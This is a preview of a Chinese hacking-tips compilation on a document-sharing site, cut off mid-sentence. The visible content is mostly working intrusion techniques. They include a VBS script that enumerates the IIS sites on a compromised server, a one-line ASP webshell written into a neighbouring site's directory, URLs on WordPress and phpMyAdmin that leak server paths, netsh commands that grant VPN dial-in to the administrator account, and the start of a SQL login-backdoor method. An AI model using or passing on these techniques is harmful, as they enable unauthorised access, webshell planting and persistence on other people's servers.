网络攻防---渗透技巧总结大全.docVIP

  1. 1、有哪些信誉好的足球投注网站(book118)网站文档一经付费(服务费),不意味着购买了该文档的版权,仅供个人/单位学习、研究之用,不得用于商业用途,未经授权,严禁复制、发行、汇编、翻译或者网络传播等,侵权必究。。
  2. 2、本站所有内容均由合作方或网友上传,本站不对文档的完整性、权威性及其观点立场正确性做任何保证或承诺!文档内容仅供研究参考,付费前请自行鉴别。如您付费,意味着您自己接受本站规则且自行承担风险,本站不退款、不进行额外附加服务;查看《如何避免下载的几个坑》。如果您已付费下载过本站文档,您可以点击 这里二次下载
  3. 3、如文档侵犯商业秘密、侵犯著作权、侵犯人身权等,请点击“版权申诉”(推荐),也可以打举报电话:400-050-0827(电话支持时间:9:00-18:30)。
  4. 4、该文档为VIP文档,如果想要下载,成为VIP会员后,下载免费。
  5. 5、成为VIP后,下载本文档将扣除1次下载权益。下载后,不支持退款、换文档。如有疑问请联系我们
  6. 6、成为VIP后,您将拥有八大权益,权益包括:VIP文档下载权益、阅读免打扰、文档格式转换、高级专利检索、专属身份标志、高级客服、多端互通、版权登记。
  7. 7、VIP文档为合作方或网友上传,每下载1次, 网站将根据用户上传文档的质量评分、类型等,对文档贡献者给予高额补贴、流量扶持。如果你也想贡献VIP文档。上传文档
查看更多
网络攻防---渗透技巧总结大全

网络攻防渗透技巧总结大全(必威体育精装版版本) 本着共享之精神,方便各位黑阔童鞋,发表此文,希望抛砖引玉,童鞋们踊跃发言。使之更加完善,在交流中进步,形成良好的互动~ 旁站路径问题 1、读网站配置。 2、用以下VBSOn Error Resume Next If (LCase(Right(WScript.Fullname,11))=wscript.exe) Then Msgbox Space(12) IIS Virtual Web Viewer Space(12) Chr(13) Space(9) Usage:Cscript vWeb.vbs,4096,Lilo WScript.Quit End If Set ObjService=GetObject (IIS://LocalHost/W3SVC) For Each obj3w In objservice If IsNumeric(obj3w.Name) Then Set OService=GetObject(IIS://LocalHost/W3SVC/ obj3w.Name) Set VDirObj = OService.GetObject(IIsWebVirtualDir, ROOT) If Err 0 Then WScript.Quit (1) WScript.Echo Chr(10) [ OService.ServerComment ] For Each Binds In OService.ServerBindings Web = { Replace(Binds,:, } { ) } WScript.Echo Replace(Split(Replace(Web, ,),}{)(2),},) Next WScript.Echo Path : VDirObj.Path End If Next 复制代码3、iis_spy列举(注:需要支持ASPX,反IISSPY的方法:将activeds.dll,activeds.tlb降权) 4、得到目标站目录,不能直接跨的。通过echo ^%execute(request(cmd))%^ X:\目标目录\X.asp 或者copy 脚本文件 X:\目标目录\X.asp 像目标目录写入webshell。或者还可以试试type命令. ————————————————————— WordPress的平台,爆绝对路径的方法是: url/wp-content/plugins/akismet/akismet.php url/wp-content/plugins/akismet/hello.php —————————————————————— phpMyAdmin暴路径办法: phpMyAdmin/libraries/select_lang.lib.php phpMyAdmin/darkblue_orange/layout.inc.php phpMyAdmin/index.php?lang[]=1 phpmyadmin/themes/darkblue_orange/layout.inc.php ———————————————————— 网站可能目录(注:一般是虚拟主机类) data/htdocs.网站/网站/ ———————————————————— CMD下操作VPN相关 netsh ras set user administrator permit #允许administrator拨入该VPN netsh ras set user administrator deny #禁止administrator拨入该VPN netsh ras show user #查看哪些用户可以拨入VPN netsh ras ip show config #查看VPN分配IP的方式 netsh ras ip set addrassign method = pool #使用地址池的方式分配IP netsh ras ip add range from = to = 54 #地址池的范围是从到54 ———————————————————— 命令行下添加SQL用户的方法 需要有管理员权限,在命令下先建立一个c:\test.qry文件,内容如下: exec master.dbo.sp_addlogin test,123 EXEC sp_addsrvro

文档评论(0)

xcs88858 + 关注
实名认证
文档贡献者

该用户很懒,什么也没介绍

版权声明书
用户编号:8130065136000003

1亿VIP精品文档

相关文档